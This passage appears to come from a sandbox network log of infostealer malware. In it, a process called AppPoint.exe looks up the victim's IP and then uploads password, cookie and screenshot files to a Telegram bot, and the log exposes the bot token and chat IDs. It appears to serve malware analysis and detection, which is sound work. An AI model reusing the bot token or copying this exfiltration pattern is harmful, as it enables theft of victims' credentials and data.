10-54-00.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAEDFC9ngUKajZKtmuP3uehVnyurZUdV-AACJB0AArsqCVBcoBmZEh9-xzYE","file_unique_id":"AgADJB0AArsqCVA","file_size":348},"caption":"New PW Recovered!\n\nTime: 01/10/2025 10:54:00\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49758	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:03 UTC	237	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd31730b64b168 Host: api.telegram.org Content-Length: 4052 Expect: 100-continue
2025-01-10 15:54:03 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:54:03 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 33 30 62 36 34 62 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 33 30 62 36 34 62 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 32 3a 33 33 3a 35 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd31730b64b168Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd31730b64b168Content-Disposition: form-data; name="caption"New CO Recovered!Time: 01/10/2025 12:33:53User
2025-01-10 15:54:03 UTC	2978	OUT	Data Raw: e9 60 12 74 34 96 a4 a3 3d 91 88 af 14 99 4e 32 bb 93 8b c5 2b 1f a3 ec 04 f3 99 ca 8a 06 b9 ac 5e 5e 86 44 5e 19 96 35 94 62 17 6a db 23 b1 f6 c5 5a b3 49 e5 17 0c c9 82 62 66 aa d2 c3 0a 2a ab 22 5e 57 50 c5 aa 8c a6 c9 92 98 1d 5e 59 99 e5 8c 46 72 3c 8f d4 55 6e 9c e1 54 b6 18 b9 e2 ad 65 a4 a8 82 aa 21 51 5b 59 2d 2b 82 a4 08 5a 85 b0 aa 91 23 33 7d 15 6a 24 5d e1 8d dc f2 19 94 5b bd 5a 96 94 0a f1 cc 24 98 1d 23 73 4a a5 a0 85 b6 ea 72 8a 33 ba ad 52 5b bd fd 78 b5 db e5 c2 f3 fe c2 08 ca 21 8d 33 17 62 d9 d8 31 4b 1a cd 4e 8f c4 a2 1d 4f 06 13 a1 ce e0 e2 1d 4a 43 bb 3b 11 7e 3c 98 e8 a5 77 32 bd 3e 7a a1 7b 97 9c ee bd 9f b0 ba 5b 5d 38 56 18 ec ea 40 d6 1c 47 9c ae 49 85 63 d6 8c c0 06 cc b5 f9 2e 6f 33 ff 63 4e 63 21 a9 09 8c ba 46 5d 36 36 00 Data Ascii: `t4=N2+^^D^5bj#ZIbf*"^WP^YFr<UnTe!Q[Y-+Z#3}j$][Z$#sJr3R[x!3b1KNOJC;~<w2>z{[]8V@GIc.o3cNc!F]66
2025-01-10 15:54:03 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 33 30 62 36 34 62 31 36 38 2d 2d 0d 0a Data Ascii: -----------------------------8dd31730b64b168--
2025-01-10 15:54:04 UTC	1149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:54:03 GMT Content-Type: application/json Content-Length: 761 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201776,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524443,"document":{"file_name":"user-642294 2025-01-10 12-33-53.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEDFDBngUKbQdijjcNpKC7IHqpsgWPNlQACJR0AArsqCVBo3xkbcS7q8TYE","file_unique_id":"AgADJR0AArsqCVA","file_size":3424},"caption":"New CO Recovered!\n\nTime: 01/10/2025 12:33:53\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49792	104.26.13.205	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:08 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-10 15:54:08 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:54:08 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ffdd80a5d250f7b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1550&rtt_var=662&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1883870&cwnd=205&unsent_bytes=0&cid=7c7230df0fb7225f&ts=170&x=0"
2025-01-10 15:54:08 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49798	149.154.167.220	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:09 UTC	260	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd31651b67dcdd Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:54:09 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:54:09 UTC	971	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 31 62 36 37 64 63 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 31 62 36 37 64 63 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 34 3a 30 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd31651b67dcddContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd31651b67dcddContent-Disposition: form-data; name="caption"New PW Recovered!Time: 01/10/2025 10:54:07User
2025-01-10 15:54:10 UTC	1143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:54:10 GMT Content-Type: application/json Content-Length: 755 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201777,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524450,"document":{"file_name":"user-642294 2025-01-10 10-54-07.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAEDFDFngUKiDgIBJcwtFW-ilzBSO6UDmAACJh0AArsqCVAsTi41Tr1fLjYE","file_unique_id":"AgADJh0AArsqCVA","file_size":348},"caption":"New PW Recovered!\n\nTime: 01/10/2025 10:54:07\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49807	149.154.167.220	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:54:11 UTC	237	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd31773f9649d9 Host: api.telegram.org Content-Length: 4052 Expect: 100-continue
2025-01-10 15:54:11 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:54:11 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 66 39 36 34 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 66 39 36 34 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 33 3a 30 33 3a 35 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd31773f9649d9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd31773f9649d9Content-Disposition: form-data; name="caption"New CO Recovered!Time: 01/10/2025 13:03:59User
2025-01-10 15:54:11 UTC	2978	OUT	Data Raw: e9 60 12 74 34 96 a4 a3 3d 91 88 af 14 99 4e 32 bb 93 8b c5 2b 1f a3 ec 04 f3 99 ca 8a 06 b9 ac 5e 5e 86 44 5e 19 96 35 94 62 17 6a db 23 b1 f6 c5 5a b3 49 e5 17 0c c9 82 62 66 aa d2 c3 0a 2a ab 22 5e 57 50 c5 aa 8c a6 c9 92 98 1d 5e 59 99 e5 8c 46 72 3c 8f d4 55 6e 9c e1 54 b6 18 b9 e2 ad 65 a4 a8 82 aa 21 51 5b 59 2d 2b 82 a4 08 5a 85 b0 aa 91 23 33 7d 15 6a 24 5d e1 8d dc f2 19 94 5b bd 5a 96 94 0a f1 cc 24 98 1d 23 73 4a a5 a0 85 b6 ea 72 8a 33 ba ad 52 5b bd fd 78 b5 db e5 c2 f3 fe c2 08 ca 21 8d 33 17 62 d9 d8 31 4b 1a cd 4e 8f c4 a2 1d 4f 06 13 a1 ce e0 e2 1d 4a 43 bb 3b 11 7e 3c 98 e8 a5 77 32 bd 3e 7a a1 7b 97 9c ee bd 9f b0 ba 5b 5d 38 56 18 ec ea 40 d6 1c 47 9c ae 49 85 63 d6 8c c0 06 cc b5 f9 2e 6f 33 ff 63 4e 63 21 a9 09 8c ba 46 5d 36 36 00 Data Ascii: `t4=N2+^^D^5bj#ZIbf*"^WP^YFr<UnTe!Q[Y-+Z#3}j$][Z$#sJr3R[x!3b1KNOJC;~<w2>z{[]8V@GIc.o3cNc!F]66
2025-01-10 15:54:11 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 37 33 66 39 36 34 39 64 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd31773f9649d9--
2025-01-10 15:54:11 UTC	1149	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:54:11 GMT Content-Type: application/json Content-Length: 761 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201778,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524451,"document":{"file_name":"user-642294 2025-01-10 13-03-59.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEDFDJngUKjtPh7zsguwTmyttn09KzFSgACJx0AArsqCVAipDWrNkVdDjYE","file_unique_id":"AgADJx0AArsqCVA","file_size":3424},"caption":"New CO Recovered!\n\nTime: 01/10/2025 13:03:59\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49992	149.154.167.220	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:31 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3c8c32eff476 Host: api.telegram.org Content-Length: 57790 Expect: 100-continue
2025-01-10 15:55:31 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:31 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 38 63 33 32 65 66 66 34 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 38 63 33 32 65 66 66 34 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 34 2f 32 30 32 35 20 31 35 3a 31 31 3a 33 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd3c8c32eff476Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3c8c32eff476Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/24/2025 15:11:39User
2025-01-10 15:55:31 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:55:31 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:31 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:31 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:31 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 38 63 33 32 65 66 66 34 37 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd3c8c32eff476--
2025-01-10 15:55:32 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:32 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201779,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524532,"document":{"file_name":"user-642294 2025-01-24 15-31-40.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUM2eBQvS48NEhcX00uXUEFdTbem4aAAIpHQACuyoJUATz1_tSuu0WAQAHbQADNgQ","file_unique_id":"AQADKR0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUM2eBQvS48NEhcX00uXUEFdTbem4aAAIpHQACuyoJUATz1_tSuu0WAQAHbQADNgQ","file_unique_id":"AQADKR0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDNngUL0uPDRIXF9NLl1BBXU23puGgACKR0AArsqCVAE89f7UrrtFjYE","file_unique_id":"AgADKR0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 01/24/2025 15:11:39\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49993	149.154.167.220	443	7724	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:33 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3ed3a6c23472 Host: api.telegram.org Content-Length: 57790 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:55:33 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:33 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 33 61 36 63 32 33 34 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 33 61 36 63 32 33 34 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 37 2f 32 30 32 35 20 31 32 3a 35 38 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd3ed3a6c23472Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3ed3a6c23472Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/27/2025 12:58:10User
2025-01-10 15:55:33 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
